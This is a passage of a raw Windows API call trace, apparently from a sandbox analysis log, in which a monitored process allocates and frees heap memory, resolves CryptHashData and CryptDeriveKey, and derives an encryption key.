returned 1 [0147.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0147.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0147.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0147.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0147.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0147.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0147.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0147.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50b00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0147.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0147.541] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0147.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0147.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0147.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0147.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0147.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0147.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0147.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0147.541] CryptHashData (hHash=0xa87290, pbData=0x2e54e68, dwDataLen=0x3, dwFlags=0x1) returned 1 [0147.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0147.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0147.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0147.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0147.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0147.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0147.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0147.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0147.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0147.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0147.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0147.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0147.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0147.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0147.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0147.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0147.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0147.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0147.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0147.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0147.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0147.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0147.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0147.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0147.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0147.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0147.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0147.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0147.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0147.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0147.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0147.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0147.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0147.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0147.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0147.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0147.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0147.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0147.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0147.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0147.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0147.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0147.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0147.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0147.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0147.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0147.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0147.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0147.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0147.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0147.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0147.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0147.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0147.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0147.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0147.544] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0147.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0147.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0147.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0147.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0147.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0147.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0147.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0147.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0147.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0147.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0147.544] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0147.544] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0147.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0147.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0147.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0147.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0147.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0147.544] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0147.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0147.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0147.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a70 [0147.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0147.545] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0147.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0147.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0147.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0147.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0147.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0147.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0147.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0147.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0147.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0147.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0147.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0147.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0147.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0147.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0147.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0147.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0147.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0147.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0147.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0147.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0147.546] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0147.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a10 [0147.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0147.546] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0147.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0147.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0147.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0147.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0147.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0147.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0147.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0147.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0147.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0147.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0147.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0147.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0147.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0147.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0147.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0147.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0147.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0147.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0147.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0147.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0147.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0147.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0147.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0147.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0147.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0147.547] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0147.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0147.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0147.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0147.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0147.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0147.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0147.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0147.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0147.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0147.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0147.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0147.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0147.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0147.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0147.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0147.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0147.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0147.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0147.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0147.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0147.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0147.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0147.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0147.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0147.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0147.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0147.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0147.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0147.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0147.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0147.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0147.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0147.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0147.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0147.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50aa0 [0147.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50aa0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0147.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0147.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0147.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0147.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0147.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0147.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0147.550] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87290, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87510) returned 1 [0147.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0147.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0147.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0147.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0147.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0147.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0147.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0147.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0147.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0147.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0147.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0147.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0147.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0147.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0147.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0147.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0147.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0147.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0147.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0147.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0147.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0147.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0147.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0147.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0147.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0147.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0147.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0147.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0147.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0147.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0147.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0147.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0147.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0147.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0147.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0147.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0147.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0147.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0147.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0147.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0147.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0147.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0147.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0147.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0147.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0147.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0147.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0147.552] 